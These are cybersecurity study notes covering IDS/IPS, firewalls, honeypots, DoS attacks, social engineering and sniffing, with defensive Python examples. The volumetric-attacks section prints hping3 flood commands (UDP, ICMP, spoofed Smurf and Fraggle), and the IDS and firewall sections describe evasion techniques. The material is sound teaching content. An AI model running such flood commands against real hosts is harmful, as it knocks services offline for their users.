IDS and IPS

  • Definition: critical tools in network security:
    • IDS detects suspicious activities and generates alerts.
    • IPS detects and actively prevents threats by blocking malicious traffic.
| Feature       | IDS                                      | IPS                                     |
|---------------|------------------------------------------|-----------------------------------------|
| Functionality | Detects intrusions and generates alerts. | Detects and actively blocks threats.    |
| Action        | Passive (alert only).                    | Active (blocks malicious traffic).      |
| Placement     | Monitors network or host traffic.        | Directly in the traffic flow (inline).  |
  • Types:

    1. Network-Based (NIDS/NIPS):
      • Monitors all network traffic.
      • Deployed at network entry/exit points.
    2. Host-Based (HIDS/HIPS):
      • Monitors traffic on individual systems.
      • Installed on operating systems (e.g., servers).
  • Alert types (based on whether an attack actually occurred and whether an alert was raised):

    • True Positive: Real attack detected, alert sent.
    • False Positive: Alert triggered, but no attack occurred.
    • True Negative: No attack, no alert.
    • False Negative: Real attack occurred, but no alert was triggered.
  • Tools:

    1. Snort: open-source IDS/IPS with customizable rules; monitors network traffic for known patterns (e.g., scans such as Xmas and FIN scans, exploits).
    2. Zeek (formerly Bro): network security monitoring tool focused on traffic analysis and anomaly detection.
    3. Suricata: advanced IDS/IPS that supports multi-threading. Often used with Snort rules for simplicity.
    4. YARA: detects malware by matching files against custom rules. Useful for identifying IOCs (Indicators of Compromise).
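The alert outcomes above and the "known patterns" a Snort-style rule matches are easiest to see on real flag bytes. The following is an added example (not Snort's engine, and not code from these notes): a minimal signature matcher for the TCP flag combinations that Xmas, FIN and NULL scans use, run over a constructed packet sample with ground-truth labels so that the four outcomes (TP/FP/TN/FN) and the false-positive rate can be counted. The signature names, the sample packets and their labels are all constructed for the demonstration.

```python
from collections import Counter

# TCP flag bits as laid out in the TCP header.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
ALL_FLAGS = FIN | SYN | RST | PSH | ACK | URG  # 0x3F

# Signatures in the spirit of a Snort "flags:" option:
# (name, bits to inspect, value those bits must have). Names are constructed.
SIGNATURES = [
    ("XMAS_SCAN", ALL_FLAGS, FIN | PSH | URG),  # FIN+PSH+URG, nothing else
    ("FIN_SCAN",  ALL_FLAGS, FIN),              # lone FIN outside any session
    ("NULL_SCAN", ALL_FLAGS, 0),                # no flags at all
]

def match_signatures(flags):
    """Return the names of all signatures the flag byte matches."""
    return [name for name, mask, value in SIGNATURES if flags & mask == value]

def evaluate(packets):
    """packets: iterable of (flags, is_attack); is_attack is the constructed
    ground truth. Returns (Counter of TP/FP/TN/FN, list of (index, hits))."""
    outcomes = Counter()
    alerts = []
    for idx, (flags, is_attack) in enumerate(packets):
        hits = match_signatures(flags)
        if hits:
            alerts.append((idx, hits))
        if hits and is_attack:
            outcomes["TP"] += 1      # real probe, alert raised
        elif hits:
            outcomes["FP"] += 1      # alert raised, nothing malicious
        elif is_attack:
            outcomes["FN"] += 1      # real probe, no alert
        else:
            outcomes["TN"] += 1      # benign and quiet
    return outcomes, alerts

def false_positive_rate(outcomes):
    """Share of benign packets that still triggered an alert (rule-tuning metric)."""
    benign = outcomes["FP"] + outcomes["TN"]
    return outcomes["FP"] / benign if benign else 0.0

# Constructed traffic sample: (flag byte, ground truth).
SAMPLE = [
    (SYN, False),              # ordinary connection attempt
    (SYN | ACK, False),        # handshake reply
    (ACK, False),              # data inside an established session
    (FIN | PSH | URG, True),   # Xmas probe
    (FIN, True),               # FIN probe
    (0, True),                 # NULL probe
    (FIN | ACK, False),        # normal graceful close, not a FIN scan
    (SYN, True),               # SYN scan probe: invisible to these signatures
    (0, False),                # flag-less segment from a buggy stack
]

if __name__ == "__main__":
    outcomes, alerts = evaluate(SAMPLE)
    print(dict(outcomes), alerts, f"FPR={false_positive_rate(outcomes):.2f}")
```

The sample is built so that each outcome appears: the SYN-scan probe is a false negative because none of the three signatures covers a bare SYN (a rate-based rule would be needed), and the flag-less segment from a broken stack is the false positive that rule tuning would have to accept or suppress.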
  • Evasion techniques:

    • Packet Fragmentation: splitting attack payloads into smaller packets.
    • Session Splicing: breaking payloads across multiple packets.
    • Decoys: using multiple sources to obscure the attacker’s identity.
    • Obfuscation: encoding payloads (e.g., Base64, Unicode).
    • DoS Attacks: overloading IDS/IPS to force failure (e.g., fail open).
    • Insertion Attacks: sending malformed packets to bypass detection.

Example: TTL Attacks

  1. The attacker sends fragmented packets with varying TTL (Time to Live) values.
  2. Fragments with a low TTL expire and are dropped by the network before reaching the target, although an IDS placed earlier on the path still sees them.
  3. The IDS therefore reassembles a different payload than the target does, and the payload the target actually receives bypasses detection.
  • Defense strategies:
    • Baseline behavior: understand normal activity to detect anomalies.
    • Patch management: regularly update and patch IDS/IPS systems.
    • Rule tuning: adjust rules to minimize false positives.
    • Disallow lists: block known malicious behaviors and payloads.

Firewalls

Network security tool used to filter and control incoming and outgoing traffic based on predefined rules. Firewalls can be hardware, software, or both; they act as a “bouncer,” determining which traffic to allow or deny based on rules.

  • Firewall lists: firewalls filter traffic using allow/deny lists (whitelisting/blacklisting). Implicit Deny is a common security practice: block all traffic except explicitly allowed connections. There are 2 main types:

    • Allow List: allows specific trusted traffic and blocks all others.
    • Deny List: blocks specific untrusted traffic and allows all others. Used when you can’t identify all trusted sources but know certain threats.
  • Deployment Strategies:

    1. Gateway Firewalls: Deployed on routers to control access at the network perimeter.
    2. Bastion Hosts: Hardened devices that act as entry points into a network.
    3. DMZ (Demilitarized Zone):
      • A network segment that isolates public-facing servers (e.g., web servers) from internal networks.
      • Prevents direct access to internal systems from the internet.
  • Types of Firewalls:

    1. Packet filtering firewalls:
      • Operates at OSI Layer 3 (Network layer).
      • Filters based on IP addresses, protocols, and port numbers.
    2. Circuit-level gateways:
      • Operates at OSI Layer 5 (Session layer).
      • Verifies legitimate sessions before allowing traffic.
    3. Application layer firewalls (e.g., WAFs, which block SQL injection attacks):
      • Operates at OSI Layer 7 (Application layer).
      • Filters traffic for specific applications like HTTP or FTP.
    4. Stateful firewalls:
      • Tracks the state of active connections.
      • Only allows traffic that is part of an established session.
    5. Next-Generation firewalls (NGFWs): combine traditional firewall capabilities with advanced features like SSL inspection and intrusion prevention.
    6. Other Types:
      • Proxy firewalls: filter traffic by acting as an intermediary between clients and servers.
      • VPNs: provide encrypted tunnels that block unauthorized access.
  • Evasion Techniques:

    • Firewalking: Testing TTL values to probe firewall rules.
    • IP Spoofing: Faking source IP addresses to bypass rules.
    • Packet Fragmentation: Breaking packets into small fragments to evade detection.
    • Denial of Service (DoS): Overwhelming the firewall to make it fail open, allowing all traffic.
    • Tunneling Traffic: Hiding malicious data within legitimate traffic (e.g., HTTPS, DNS).
    • Proxies: Using a proxy server to bypass IP-based filtering.
  • Defense strategies:

    1. Implicit Deny: Block all traffic by default unless explicitly allowed.
    2. Ingress and Egress Rules: Ensure traffic is filtered both entering and exiting the network.
    3. Regular Updates: Apply security patches to prevent exploitation of vulnerabilities.
    4. Testing and Review: Periodically test and refine rules to ensure they are effective.
    5. Logging and Monitoring: Use SIEM solutions to monitor firewall activity and detect anomalies.
  • Implementing firewalls: filtering can be placed at several layers of the OSI model:

    • Network Layer (Layer 3): controls traffic based on IP addresses, protocols, and ports. Common in routers and standalone firewalls.
    • Transport Layer (Layer 4): filters traffic based on TCP/UDP port numbers and connection states. Used in stateful firewalls.
    • Application Layer (Layer 7): inspects the contents of packets for specific applications (e.g., HTTP, FTP). Used in application firewalls and web application firewalls (WAFs).
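To make the allow list, deny list, implicit deny, ingress/egress rules and stateful tracking concrete, here is an added example of a toy Layer 3/4 stateful packet filter in Python. It is illustrative code written for these notes, not the implementation of any real firewall; the addresses, the policy and the packet sequence are all constructed.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional

@dataclass(frozen=True)
class Packet:
    direction: str     # "in" (entering the protected network) or "out"
    proto: str         # "tcp" or "udp"
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False  # True for a TCP segment that opens a connection

@dataclass
class Rule:
    action: str        # "allow" or "deny"
    direction: str
    proto: str
    src: str = "0.0.0.0/0"
    dst: str = "0.0.0.0/0"
    dport: Optional[int] = None   # None matches any destination port

    def matches(self, p: Packet) -> bool:
        return (self.direction == p.direction and self.proto == p.proto
                and ip_address(p.src) in ip_network(self.src)
                and ip_address(p.dst) in ip_network(self.dst)
                and (self.dport is None or self.dport == p.dport))

class StatefulFirewall:
    """First-match rule evaluation, implicit deny, and a connection table."""

    def __init__(self, rules):
        self.rules = list(rules)
        self.connections = set()   # (proto, src, sport, dst, dport) of allowed flows

    def filter(self, p: Packet) -> str:
        flow = (p.proto, p.src, p.sport, p.dst, p.dport)
        reply = (p.proto, p.dst, p.dport, p.src, p.sport)  # same flow, other direction
        if flow in self.connections or reply in self.connections:
            return "allow (established)"     # stateful match, rules not consulted
        for rule in self.rules:
            if rule.matches(p):
                if rule.action == "allow" and (p.proto == "udp" or p.syn):
                    self.connections.add(flow)  # remember the flow so replies pass
                return rule.action
        return "deny (implicit)"             # no rule matched: default deny

INTERNAL = "10.0.0.0/8"   # constructed addressing for the protected network

POLICY = [
    # Deny-list entry: placed first so it wins over the allow rules below.
    Rule("deny", "in", "tcp", src="203.0.113.0/24"),
    # Ingress allow list: only the published HTTPS server is reachable.
    Rule("allow", "in", "tcp", dst="10.0.0.80/32", dport=443),
    # Egress allow list: internal hosts may use HTTPS and DNS, nothing else.
    Rule("allow", "out", "tcp", src=INTERNAL, dport=443),
    Rule("allow", "out", "udp", src=INTERNAL, dport=53),
]

def run_scenario():
    """Feed constructed packets through the policy; return the verdict list."""
    fw = StatefulFirewall(POLICY)
    packets = [
        # 1. Internal client opens HTTPS to an external site: egress rule.
        Packet("out", "tcp", "10.0.0.5", 40000, "198.51.100.7", 443, syn=True),
        # 2. The reply comes back: accepted from the connection table.
        Packet("in", "tcp", "198.51.100.7", 443, "10.0.0.5", 40000),
        # 3. Unsolicited inbound segment to the same client port: implicit deny.
        Packet("in", "tcp", "198.51.100.9", 443, "10.0.0.5", 40000, syn=True),
        # 4. Outside host reaching the published web server: ingress rule.
        Packet("in", "tcp", "192.0.2.10", 51000, "10.0.0.80", 443, syn=True),
        # 5. Same service from the deny-listed network: deny rule wins.
        Packet("in", "tcp", "203.0.113.4", 51000, "10.0.0.80", 443, syn=True),
        # 6. Internal host trying Telnet outbound: no egress rule, implicit deny.
        Packet("out", "tcp", "10.0.0.5", 40001, "198.51.100.7", 23, syn=True),
    ]
    return [fw.filter(p) for p in packets]

if __name__ == "__main__":
    for verdict in run_scenario():
        print(verdict)
```

Two points worth noticing: packet 2 is accepted without any inbound rule for port 40000 because the firewall remembered the outbound flow (this is what a stateless packet filter cannot do, and why it would need a wide "allow inbound from port 443" hole), and packet 3 is rejected even though it looks like the same traffic, because no connection table entry exists for it.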
  • Evading firewalls

    • Firewalking: technique used to determine the rules of a firewall by sending packets with varying TTL values and analyzing the responses. It helps attackers map the firewall rules and identify open ports.
    • IP Spoofing: altering the source IP address of packets to impersonate a trusted host. This can bypass IP-based access controls and make malicious traffic appear to come from a legitimate source.
    • Fragmentation: involves breaking a packet into smaller fragments to evade detection by firewalls that do not reassemble fragmented packets before inspection. This can bypass filters that detect specific patterns in larger packets.
    • Tunneling: encapsulates one type of traffic within another protocol to bypass firewalls. Common examples include using HTTP or DNS to tunnel other types of traffic, making it appear as normal web or DNS traffic to evade firewall rules.

Honeypots

Environments that attract and trap attackers by mimicking real systems or data. They allow administrators to monitor and analyze attacker behavior without risking real systems.

  • Types by interaction levels:

    • Low Interaction: simulates only basic services and interactions. Minimal engagement with attackers (e.g. a simple web server that logs attempted connections and basic interactions).
    • Medium Interaction: provides more realistic services and interactions. Engages attackers longer but still does not mimic a full operating system (e.g. a virtual machine that simulates a range of services like FTP, SSH, and HTTP, allowing attackers to perform more extensive actions).
    • High Interaction: fully functional systems that mimic real production environments. Engages attackers for extended periods, providing deep insights (e.g. complete operating system set up with real applications and data to observe complex attack patterns).
    • Pure Interaction: real systems used as honeypots. No simulation; attackers interact with actual operating systems and services (a real server with a standard OS and applications deployed as a honeypot to gather comprehensive data on attacker methods).
  • Varieties:

    • Client honeypots: simulate client-side applications to detect malicious servers (e.g. a web browser honeypot that visits websites to identify drive-by downloads and other client-side attacks).
    • Database honeypots: mimic database systems to attract attackers targeting database services (e.g. a fake MySQL server designed to log SQL injection attempts and unauthorized access attempts).
    • Spam honeypots: designed to attract and collect spam messages for analysis (e.g. an email server that accepts all incoming messages to gather spam for studying spammer tactics and origins).
    • Malware Honeypots: attract and capture malware to study its behavior and propagation (e.g. a virtual environment that allows malware to infect it, recording the malware’s actions and analyzing its impact and communication patterns).

DoS and DDoS attacks

  • Definition: DoS (Denial of Service) and DDoS (Distributed Denial of Service) attacks aim to prevent services from being accessible.

    • DoS: (single attacker) makes a service (e.g., web server, FTP) inaccessible to legitimate users.
    • DDoS: (multiple attackers, harder to defend against) involves multiple attack points (botnets) targeting the same service.
  • Techniques:

    1. Volumetric attacks: deplete the bandwidth of the target by flooding it with large amounts of data.
      • Amplification attacks: attack data grows larger than the original request (UDP flooding, ICMP flooding, Ping of Death, Smurf attacks).
      • Pulse wave attacks: particularly effective in hybrid cloud environments.
    2. Protocol attacks: target the protocols themselves (e.g., TCP).
      • SYN Flood: floods with SYN packets, exploiting the three-way handshake in TCP.
      • ACK Flood: sends ACK packets, overwhelming the target.
      • Fragmentation attacks: break packets into smaller pieces to exhaust the system.
    3. Application layer attacks: aimed at the application layer (e.g., web servers). Example: a Slowloris attack keeps connections open, consuming server resources without closing them.
      • UDP application layer flood: uses the UDP protocol to flood application layers with requests, causing resource starvation.
    4. Multi-vector attacks: combine multiple attack vectors.
  • Edge cases:

    • Permanent Denial of Service: malware can destroy the hardware or data, making the service permanently unavailable (e.g., bricking a device by corrupting BIOS).
    • Reflective Denial of Service Attacks: the attacker uses a third party (e.g., a server) to attack the victim, making it appear that the attack is coming from someone else.
  • Tools:

    • LOIC (Low Orbit Ion Cannon):
      • Purpose: open-source network stress testing and DoS attack tool.
      • Use: generates high traffic to target services.
    • HOIC (High Orbit Ion Cannon):
      • Purpose: advanced version of LOIC, used for DDoS attacks.
      • Features: can target multiple URLs simultaneously.
    • Hping3:
      • Purpose: Network packet generator and analyzer.
      • Use: Can craft custom packets for security testing, including DoS attacks.

Volumetric attacks

Volumetric attacks are a category of Denial of Service (DoS) attacks that focus on overwhelming the bandwidth or resources of a network, application, or server. These attacks generate massive traffic to flood and exhaust the resources, causing legitimate requests to be denied.

  • Key characteristics:

    • High Traffic Volume: the attack aims to generate a massive volume of traffic, often in the form of requests or data packets, to overwhelm a target.
    • Network or Application-Level Impact: these attacks can affect both network infrastructure and application performance.
    • Resource Exhaustion: the goal is to consume all available resources (e.g., bandwidth, CPU, memory), rendering the service unavailable.
  • Types:

    • UDP Flood: Sends large volumes of UDP packets to random ports on a target server, consuming bandwidth and resources (e.g hping3 --udp -p 80 -i u1 192.168.1.1).
    • ICMP Flood (Ping Flood): Floods the target with ICMP Echo Request packets, consuming the network bandwidth (e.g. hping3 --icmp -i u1 192.168.1.1).
    • DNS Amplification: Exploits DNS servers to amplify the attack traffic, sending a small query that generates a large response, overwhelming the target.
    • NTP Amplification: Similar to DNS amplification but uses NTP servers to flood the target with responses.
    • HTTP Flood: Sends a large number of HTTP requests to a web server, attempting to exhaust its resources or overload the network.
    • Smurf Attack: Exploits the ICMP protocol by sending a small ping request to a network’s broadcast address, with the source address spoofed to that of the target. All devices in the network reply to the spoofed address, flooding the target with traffic (e.g. hping3 --icmp -a 192.168.1.1 --broadcast 192.168.1.255).
    • Fraggle Attack: Similar to the Smurf attack, but it uses UDP packets (typically to port 7 or 19, which are associated with echo and chargen services). The attacker sends a request to a broadcast address with the source address spoofed to the target, and all devices on the network respond, amplifying the traffic directed at the target (e.g. hping3 --udp -a 192.168.1.1 --broadcast -p 7 192.168.1.255).
    • Pulse Wave Attack (extra): involves sending short bursts or pulses of high traffic at regular intervals to overwhelm a target’s defenses. This type of attack aims to bypass traditional DDoS defenses by rapidly fluctuating the intensity of the attack (e.g. burst of hping3 --flood -p 80 192.168.1.1 -i u100).

Protocol attacks

These attacks take advantage of the TCP protocol (three-way handshake). They consume resources such as connection state tables in network infrastructure components such as load balancers, firewalls, and application servers.

  • Techniques:

    • SYN flood attack: takes advantage of a flaw in how most hosts implement the TCP three-way handshake. Normally, a connection is established with the three-way handshake, and the host keeps track of each partially open connection in a listening queue while it waits for the client's ACK. In a SYN flood, the intruder sends an unlimited stream of SYN packets (requests) to the host, faster than the system can handle, so the queue fills with half-open connections that never complete.
    • Fragmentation attack: these attacks send fragmented packets that exploit vulnerabilities in the target’s packet reassembly process, causing crashes or resource exhaustion.
    • Spoofed session flood attack
    • ACK flood attack: attackers overwhelm servers by sending a massive number of TCP ACK packets, forcing the server to process these packets unnecessarily.
    • Ping of Death: by sending oversized ICMP packets, attackers can crash or freeze the target system due to buffer overflows.
  • Impacts:

    • Exhaustion of resources: targets can run out of available connections, memory, or processing power.
    • Disrupted services: legitimate users cannot access the network or application during the attack.
    • Performance degradation: even partial success in a protocol attack can slow down network performance significantly.
    • Operational costs: mitigating such attacks often requires costly infrastructure upgrades or third-party services.
  • Mitigations:

    • Web Application Firewalls (WAFs).
    • Stateful Firewalls.
    • Rate Limiting.
    • Deep Packet Inspection (DPI).
    • Anycast Networks.
    • Traffic Scrubbing Services.
    • Connection Timeouts and Limits.
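The SYN flood description and the "Connection Timeouts and Limits" mitigation can be seen together in a small half-open connection tracker. The following is an added example written for these notes, not code from any IDS or operating system: it replays a constructed packet log, keeps the half-open (SYN seen, ACK not yet seen) entries per service, expires them after a timeout, and raises one alert when a service's backlog exceeds a limit. The limit and timeout values are deliberately tiny for the demonstration.

```python
HALF_OPEN_LIMIT = 5      # backlog a service may hold (tiny for the demo)
HALF_OPEN_TIMEOUT = 5.0  # seconds an incomplete handshake is kept

class HalfOpenTracker:
    """Keeps the half-open (SYN seen, final ACK not seen) connections per
    service and raises an alert when a service's backlog exceeds the limit."""

    def __init__(self, limit=HALF_OPEN_LIMIT, timeout=HALF_OPEN_TIMEOUT):
        self.limit, self.timeout = limit, timeout
        self.pending = {}      # (src, sport, dst, dport) -> time the SYN arrived
        self.alerted = set()   # services currently in alert state
        self.alerts = []       # (time, (dst, dport), backlog depth)

    def _expire(self, now):
        # Connection timeouts: stale half-open entries are dropped, which is
        # what keeps a flood from pinning the table forever.
        for key, t in list(self.pending.items()):
            if now - t > self.timeout:
                del self.pending[key]

    def backlog(self, dst, dport):
        return sum(1 for (_, _, d, p) in self.pending if (d, p) == (dst, dport))

    def observe(self, pkt):
        """pkt: dict with time, src, sport, dst, dport and flags ('S' or 'A')."""
        now = pkt["time"]
        self._expire(now)
        key = (pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"])
        service = (pkt["dst"], pkt["dport"])
        if pkt["flags"] == "S":
            self.pending[key] = now
            depth = self.backlog(*service)
            if depth > self.limit and service not in self.alerted:
                self.alerted.add(service)          # alert once per episode
                self.alerts.append((now, service, depth))
            elif depth <= self.limit:
                self.alerted.discard(service)      # backlog recovered
        elif pkt["flags"] == "A":
            self.pending.pop(key, None)   # handshake completed: no longer half-open

def build_sample_log():
    """Constructed packet log: one honest client, a burst of SYNs from
    spoofed sources that never finish the handshake, then another client."""
    log = [
        {"time": 0.00, "src": "10.0.0.5", "sport": 40000, "dst": "10.0.0.80", "dport": 443, "flags": "S"},
        {"time": 0.05, "src": "10.0.0.5", "sport": 40000, "dst": "10.0.0.80", "dport": 443, "flags": "A"},
    ]
    for i in range(8):
        log.append({"time": 1.0 + 0.1 * i, "src": f"203.0.113.{i + 1}", "sport": 50000 + i,
                    "dst": "10.0.0.80", "dport": 443, "flags": "S"})
    log.append({"time": 10.0, "src": "10.0.0.6", "sport": 40001, "dst": "10.0.0.80", "dport": 443, "flags": "S"})
    return log

def analyse(log, limit=HALF_OPEN_LIMIT, timeout=HALF_OPEN_TIMEOUT):
    tracker = HalfOpenTracker(limit, timeout)
    for pkt in log:
        tracker.observe(pkt)
    return tracker

if __name__ == "__main__":
    t = analyse(build_sample_log())
    print("alerts:", t.alerts, "still half-open:", len(t.pending))
```

The honest client's entry disappears as soon as its ACK arrives, the sixth spoofed SYN pushes the backlog past the limit and produces the single alert, and by the time the second client connects the timeout has cleared the flood's entries, so the service is reachable again. In the real stack this is what a bounded listen backlog plus SYN timeouts (or SYN cookies) provide.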

Application layer attacks

They consume application resources or services, thereby making them unavailable to other legitimate users.

  • Attack techniques:

    • HTTP GET/POST attack: threat actors send a large number of HTTP requests to a web server within a short span. This consumes resources and denies legitimate requests. Such attacks are difficult to distinguish from legitimate traffic.
    • Slowloris attack: involves sending partial HTTP requests to a server. This keeps connections open for as long as possible, and as a result the server becomes overwhelmed and eventually denies service to many legitimate requests.
    • UDP application layer flood attack: sending numerous requests that can overwhelm the server, especially when it’s not properly configured to handle such traffic.
    • DDoS extortion attack: threaten to launch an application layer attack unless a ransom is paid. This can involve overwhelming the application with requests until the victim complies.
  • Mitigations:

    • Web Application Firewalls (WAFs)
    • Behavioral Analytics and Machine Learning
    • Rate Limiting and Throttling
    • CAPTCHA and JavaScript Challenges
    • IP Reputation Filtering and Rate Limiting
    • Cloud-based Mitigation Solutions

Botnets

“Robot Network”: a dispersed group of compromised, remotely controlled systems. The lack of security in IoT devices made building them easy. Botnets are not only used for DDoS: also for automated polls or cryptomining.

  • They require an Internet connection, and they can spread by compromising more machines through internal networks.

DoS and DDoS countermeasures

  • Mitigations:

    • Traffic filtering: implement filtering solutions such as rate limiting and blocking suspicious traffic.
    • Content Delivery Networks (CDNs): CDNs can absorb high volumes of traffic, distributing the load across multiple servers.
    • Intrusion Prevention Systems (IPS): use IPS to detect and block attack traffic before it reaches critical systems.
    • Anti-DDoS solutions: dedicated services or appliances designed to detect and mitigate DoS/DDoS attacks.
    • Rate Limiting: restrict the number of requests a client can make to a server within a certain time frame to reduce the attack’s effectiveness.
  • Challenges in defense:

    • Volume and complexity: the sheer scale of the attack can overwhelm defenses, especially without prior detection and mitigation plans.
    • Botnets: volumetric attacks often use large botnets to generate traffic, making it difficult to distinguish malicious traffic from legitimate traffic.
    • Increased latency: while mitigating these attacks, organizations may experience increased latency or degraded performance for legitimate users.
  • Detection:

    • Traffic anomalies: monitoring for sudden spikes in traffic volume or unusual patterns can help detect volumetric attacks early.
    • Behavioral analysis: analyzing baseline traffic patterns and looking for deviations from normal behavior can be an effective detection method.
    • Rate of requests: unusual increases in the rate of requests to a particular service or endpoint may indicate an ongoing volumetric attack.
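Rate limiting appears twice above as a mitigation ("restrict the number of requests a client can make to a server within a certain time frame"). The following is an added example, written for these notes and not taken from any product, of the usual way to implement it: a per-client token bucket, run over a constructed request stream containing one client that behaves and one that sends 100 requests in a second. The client addresses, rate and capacity are constructed values.

```python
from collections import defaultdict

class TokenBucketLimiter:
    """Per-client token bucket: a client starts with `capacity` tokens, earns
    `rate` tokens per second up to that capacity, and each request spends one
    token or is rejected. Bursts up to the capacity pass; sustained excess does not."""

    def __init__(self, rate, capacity):
        self.rate, self.capacity = rate, capacity
        self.buckets = {}   # client -> (tokens, time of last update)

    def allow(self, client, now):
        tokens, last = self.buckets.get(client, (self.capacity, now))
        tokens = min(self.capacity, tokens + (now - last) * self.rate)  # refill
        if tokens >= 1:
            self.buckets[client] = (tokens - 1, now)
            return True
        self.buckets[client] = (tokens, now)
        return False

def build_requests():
    """Constructed request stream as (timestamp, client) pairs."""
    reqs = [(1.0 * i, "10.0.0.5") for i in range(20)]          # one request per second
    reqs += [(0.01 * i, "203.0.113.9") for i in range(100)]    # 100 requests in one second
    reqs.sort()
    return reqs

def apply_limit(requests, rate=1.0, capacity=10):
    """Run the stream through the limiter; return accepted/rejected counts per client."""
    limiter = TokenBucketLimiter(rate, capacity)
    stats = defaultdict(lambda: {"accepted": 0, "rejected": 0})
    for t, client in requests:
        stats[client]["accepted" if limiter.allow(client, t) else "rejected"] += 1
    return dict(stats)

if __name__ == "__main__":
    for client, counts in apply_limit(build_requests()).items():
        print(client, counts)
```

With one token per second and a capacity of ten, the well-behaved client never runs dry, while the bursting client gets its first ten requests (the burst allowance) and is rejected for the remaining ninety. The per-client key is the weak point against a distributed attack, which is why the notes list it alongside CDNs and scrubbing rather than as a complete answer.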

Social engineering concepts and attacks

Social engineering involves manipulating individuals to reveal confidential information or provide unauthorized access. Attackers exploit trust, fear, and ignorance to achieve these goals.

  • Common targets:

    • Help desk & support staff: they have access to sensitive systems and data.
    • Admins & IT personnel: often hold higher access levels.
    • Executives (C-level): have access to critical organizational resources.
    • Anyone with desired access: attackers target individuals with access, regardless of role.
  • Techniques:

    • Framing & pretexting: making lies believable through authority or familiarity.
    • Types of framing:
      • Negative: authority, social pressure, urgency.
      • Positive: trust-building, helpfulness.
  • Phases:

    1. Research: gather details about the target.
    2. Target selection: identify individuals with required access.
    3. Relationship building: gain trust or rapport.
    4. Exploitation: use the relationship to gain access or sensitive information.
  • Types of social engineering:

    • Human-based:
      • Piggybacking: gaining access by following an authorized person.
      • Tailgating: entering a restricted area without authorization.
      • Dumpster Diving: searching trash for confidential information.
      • Impersonation, vishing, and eavesdropping.
    • Computer-based:
      • Phishing: trick targets into clicking malicious links or sharing credentials.
      • Spear phishing: targeted attacks on specific individuals or departments.
      • Whaling: targeting high-profile individuals like executives.
      • Smishing: phishing over SMS.
  • Countermeasures:

    • Security awareness training: regular training on social engineering tactics.
    • Mock phishing campaigns: test employee awareness and response.
    • Anti-phishing tools: toolbars and detection systems.
    • Visitor check-in: control building access with visitor logs and badges.
    • Physical security: locks, RFID badges, and proper garbage disposal.
    • Strong security policies: enforce password policies, multi-factor authentication, and restricted access zones.

Insider threats

Insider threats involve individuals within an organization who misuse their trusted access, intentionally or unintentionally, to cause harm or security risks.

  • Types:

    1. Disgruntled employees: employees seeking revenge due to perceived mistreatment or termination.
    2. Negligent insiders: individuals who unintentionally cause harm by neglecting security protocols (e.g., mishandling passwords).
    3. Professional insiders: individuals hired or compromised to deliberately gather or exfiltrate data.
    4. Compromised insiders: individuals coerced, blackmailed, or financially influenced to act against the company.
  • Motivation:

    • Revenge: driven by personal grievances against the organization.
    • Financial gain: compromised insiders may be influenced by financial incentives or debt.
    • Competitive advantage: competitors might embed insiders to access trade secrets.
    • Hacktivism: motivated by ethical or moral beliefs, intending to harm organizations perceived as unethical.
    • Coercion: insider pressured through blackmail or threats.
  • Indicators:

    • Unusual data access: large amounts of sensitive data accumulated or moved.
    • Odd login times: access outside normal working hours or from multiple devices simultaneously.
    • Physical access attempts: unusual activity near restricted areas, like server rooms.
    • Behavioral changes: employees acting secretive or displaying unusual work patterns.
  • Defenses:

    1. Monitoring and logging: track access to sensitive data and alert unusual activities.
    2. Background checks: conduct checks before providing access, especially for sensitive roles.
    3. User account termination policy: disable accounts immediately upon termination.
    4. Role-based access and least privilege: limit data and system access based on roles.
    5. Separation of duties: divide responsibilities to prevent one individual from having too much control.
    6. Forced vacations: require time off to observe if issues arise in an employee’s absence.
  • Tools for detection:

    • Regularly review access logs and set alerts for abnormal activities.
    • Conduct routine background checks, especially for roles requiring high-level access.
    • Implement strict policies for access and review permissions regularly.

Identity theft

Identity theft involves impersonating someone’s identity, typically in digital form, to commit fraud or other malicious activities. Attackers may steal digital or physical information to assume another’s identity for financial gain, criminal activity, or personal advantage.

  • Motivations:

    • Financial gain: stealing personal info to commit fraud, open credit lines, or steal tax refunds.
    • Avoiding detection: using a stolen identity to commit crimes without being traced.
    • Framing victims: using someone else’s identity to place blame on them.
    • Gaining access: using another’s identity to bypass restricted access or gain legitimacy.
  • Commonly targeted information:

    • Standard IDs: social security numbers, driver’s licenses, tax info.
    • Financial details: banking information, credit/debit card data.
    • Insurance and benefits info: personal details for health, life, or other insurance.
    • Children’s Information: often exploited for credit fraud as it may go unnoticed for years.
  • Methods:

    1. Physical theft: stealing wallets, purses, or personal devices.
    2. Open Source Intelligence (OSINT): gathering publicly available information to impersonate someone.
    3. Social engineering: phishing, shoulder surfing, and dumpster diving to acquire sensitive data.
    4. Digital hacking: compromising systems, installing keyloggers, or hacking into unsecured devices.
    5. Mail theft: stealing physical mail to gain sensitive information.
  • Indicators:

    • Unfamiliar charges: unknown purchases or withdrawals on statements.
    • Missing mail: sudden lack of statements or bills, or receiving unfamiliar bills.
    • Debt collection notices: unexpected contact from debt collectors.
    • Credit report changes: changes in credit scores or history without known cause.
    • Tax filing issues: attempting to file taxes and finding they were already filed.
  • Prevention tips:

    • Monitor financial activity: regularly check bank statements and use credit monitoring services.
    • Secure physical mail: collect mail daily and secure important documents.
    • Use strong security practices: enable multi-factor authentication, use strong passwords, and consider password managers.
    • Limit information sharing: avoid oversharing personal info on social media.
    • Be cautious with unknown contacts: avoid answering unknown calls and verify unexpected communication.

Network sniffing

  • Definition: capturing and inspecting the packets that traverse a network segment.

    • Sniffing is straightforward in hub-based networks, as the traffic on a segment passes through all the hosts associated with that segment. However, most networks today work on switches. A switch is an advanced computer networking device. The major difference between a hub and a switch is that a hub transmits line data to each port on the machine and has no line mapping, whereas a switch looks at the Media Access Control (MAC) address associated with each frame passing through it and sends the data to the required port. A MAC address is a hardware address that uniquely identifies each node of a network.
    • Packet sniffers put the host system’s NIC into promiscuous mode. A NIC in promiscuous mode can then capture all packets on the segment it is attached to, not only those addressed to it.

  • Types:

    • Passive Sniffing: does not require any packets to be sent. It only captures and monitors the packets flowing in the network.
    • Active Sniffing: searches for traffic on a switched LAN by actively injecting traffic into the LAN; it also refers to sniffing through a switch (port mirroring). Active sniffing involves sending out multiple network probes to identify access points. Active sniffing techniques include:
      • MAC Flooding: involves flooding the CAM table with fake MAC address and IP pairs until it is full.
      • DNS Poisoning: involves tricking a DNS server into believing that it has received authentic information when, in reality, it has not.
